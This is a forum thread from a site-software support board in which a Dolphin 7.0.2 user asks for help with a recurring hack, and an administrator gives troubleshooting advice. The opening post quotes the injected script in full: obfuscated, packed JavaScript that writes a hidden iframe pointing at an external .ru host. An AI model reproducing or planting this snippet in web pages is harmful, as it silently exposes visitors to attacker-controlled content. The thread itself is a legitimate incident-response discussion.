+ Reply to Thread (include dating software, release, and patch number!)
Page 1 of 2 1 2 LastLast
Results 1 to 10 of 11

Thread: Hacked?

  1. #1
    Knuty's Avatar
    Join Date
    Sep 2006
    Posts
    103

    Default Hacked?

    I get his in my _header.html
    I can remove it but it coming back. Do someone now how I permanent remove it?
    <script type="text/javascript">eval(function(p,a,c,k,e,d){e=function( c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6.7(\'<1 5="4://2.3.8/c/9.f?e" d="0" a="0" b="0"></1>\');',16,16,'|iframe|ad|1gb|http|src|document|wr ite|ru|in|height|frameborder|script|width|default| cgi'.split('|'),0,{}));</script>
    Dolphin 7.0.2

  2. #2
    Knuty's Avatar
    Join Date
    Sep 2006
    Posts
    103

    Default

    Anyone have a idea?
    Dolphin 7.0.2

  3. #3
    Administrator Smoge's Avatar
    Join Date
    Mar 2005
    Posts
    6,642
    Blog Entries
    5

    Default

    Quote Originally Posted by Knuty View Post
    Anyone have a idea?
    You have had problems like this for a long time.... and I have mentioned many times that your hosting maybe substandard or insecure.

    I would really recommend you take a close look at your host, and your script configuration (permissions and so on).

    Also, any modifications you have added to the code.

    Warm regards,
    Smoge
    ModMySite Administrator

    Problems? Questions? Need modifications or other help with your site?

    Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

  4. #4
    Knuty's Avatar
    Join Date
    Sep 2006
    Posts
    103

    Default

    Well, I do not have this problem for a long time and you never tild me anything so I maybe think you take for an other user

    My host have search the servere and found nothing. I have chaecked permissions and find it ok.
    Dolphin 7.0.2

  5. #5
    Administrator Smoge's Avatar
    Join Date
    Mar 2005
    Posts
    6,642
    Blog Entries
    5

    Default

    Quote Originally Posted by Knuty View Post
    Well, I do not have this problem for a long time and you never tild me anything so I maybe think you take for an other user
    Maybe... ha ha

    My host have search the servere and found nothing. I have chaecked permissions and find it ok.
    and register_globals is ON or OFF?

    Smoge
    ModMySite Administrator

    Problems? Questions? Need modifications or other help with your site?

    Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

  6. #6
    Knuty's Avatar
    Join Date
    Sep 2006
    Posts
    103

    Default

    Quote Originally Posted by Smoge View Post
    Maybe... ha ha



    and register_globals is ON or OFF?

    Smoge
    OFF for years
    Dolphin 7.0.2

  7. #7
    Administrator Smoge's Avatar
    Join Date
    Mar 2005
    Posts
    6,642
    Blog Entries
    5

    Default

    Then next step - check your apache logs for suspicious entries...

    Download your site, and search it for malicious code...

    Detective time... but you need data .... so use the available data (logs) you have to see what has been happening with your site.

    You can view it as a challenge, or as a annoyance - but if you view it as a challenge, it can be more fun.

    Warm regards,
    Smoge
    ModMySite Administrator

    Problems? Questions? Need modifications or other help with your site?

    Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

  8. #8

    Join Date
    Apr 2010
    Posts
    2

    Default

    Quote Originally Posted by Knuty View Post
    I get his in my _header.html
    I can remove it but it coming back. Do someone now how I permanent remove it?
    I'd like to know what was the soluction to the problem reported in this post.
    In the time being i have this problem with my site.

    If someone has some idea about the soluctión, i will be happy

  9. #9
    Administrator Smoge's Avatar
    Join Date
    Mar 2005
    Posts
    6,642
    Blog Entries
    5

    Default

    To start, check or ask your host, is "register_globals" on in your hosting... it should be OFF. That is step one.

    Smoge
    ModMySite Administrator

    Problems? Questions? Need modifications or other help with your site?

    Open A Ticket , Send Us An Email Or Give Us A Telephone Call +1 518-632-4152.

  10. #10

    Join Date
    Apr 2010
    Posts
    2

    Default

    Hello Smoge:

    register_globals is OFF.

    We have downloaded our site and we have verified that does not contain virus.

    We have checked with Drweb and all index.html contains some javascript code obfuscated to link to www.hertybaxy.com (Warning: maliciosus site).

    Al files affected has write protection.

    At this time the site was fixed an runing Ok but we are not sure that have this problem in the future again.
    Last edited by ocupado; 04-18-2010 at 08:54 AM.

+ Reply to Thread (include dating software, release, and patch number!)
Page 1 of 2 1 2 LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

     

Similar Threads

  1. Repeatedly hacked
    By birkenstam in forum Dolphin General Discussion v6.00 and above
    Replies: 4
    Last Post: 11-20-2008, 06:22 AM
  2. 6.0.3 Hacked?
    By SittingOut in forum Dolphin General Discussion v6.00 and above
    Replies: 2
    Last Post: 08-24-2008, 01:13 PM
  3. My site was hacked
    By chips29 in forum Security / Server Administration
    Replies: 14
    Last Post: 09-01-2007, 05:51 AM
  4. I got hacked! Great :(
    By eSiK in forum Security / Server Administration
    Replies: 22
    Last Post: 05-11-2007, 06:09 AM
  5. hacked
    By valentino in forum Security / Server Administration
    Replies: 7
    Last Post: 09-25-2006, 08:30 AM

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts